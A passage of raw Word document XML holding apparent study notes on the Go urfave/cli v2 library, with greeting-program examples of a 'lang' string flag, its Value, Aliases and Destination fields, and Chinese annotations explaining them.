    <w:p w14:paraId="4DC93E3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "github.com/urfave/cli/v2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C657BAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C46B408" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F754702" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31320918" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    app := &amp;cli.App{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793B0BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Flags: []cli.Flag{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F02664" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &amp;cli.StringFlag{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FD9B1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                Name:  "lang",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163406F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Value: "english",# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>占位符值这里是不写的，因为没用的话，没必要有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FB24DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="1260" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Aliases: []string{"c"},# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>短命名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C21FE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                Usage: "language for the greeting",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这里没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Destination</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字段，把接收的值传给特定变量来接收</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4ED727" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA0E522" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D832DC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        Action: func(cCtx *cli.Context) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7F2E3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            name := "Nefertiti"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561DADEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            if cCtx.NArg() &gt; 0 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA66026" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                name = cCtx.Args().Get(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C35FBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3C5F2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            if cCtx.String("lang") == "spanish" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491C1DCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                fmt.Println("Hola", name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B06D95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4968CFBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                fmt.Println("Hello", name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F63AA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053442CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F3862B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596EF556" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C6DCA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380BC889" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err := app.Run(os.Args); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37190FC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577E2CBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E872F65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4331FC46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;cli.StringFlag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA7E750" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>您还可以为标志设置目标变量，内容将扫描到该标志。请注意，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为标志设置了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它将显示为默认值，并且目标将在命令行上解析标志之前设置为此值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1761D8C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC54526" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA7EE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE30AF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2824E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011CB233" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ED00CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5344B41B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBE49E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "github.com/urfave/cli/v2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5824D696" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18492BE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A254C73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F2BF55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var language string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A2D467" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BBB59EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    app := &amp;cli.App{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7578CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        Flags: []cli.Flag{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA7D738" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &amp;cli.StringFlag{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F8404F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                Name:        "lang",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C7DCAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                Value:       "english",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0369F214" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                Usage:       "language for the greeting",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1278AE47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Destination: &amp;language,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC2986F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565EAE78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09580AC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        Action: func(cCtx *cli.Context) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A1942A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            name := "someone"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDC102" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            if cCtx.NArg() &gt; 0 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A25AF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                name = cCtx.Args().Get(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87BB12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520947B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            if language == "spanish" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DECFEBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                fmt.Println("Hola", name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F55A26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A903435" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                fmt.Println("Hello", name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592F84E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0AA634" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2696DE47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DA04EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
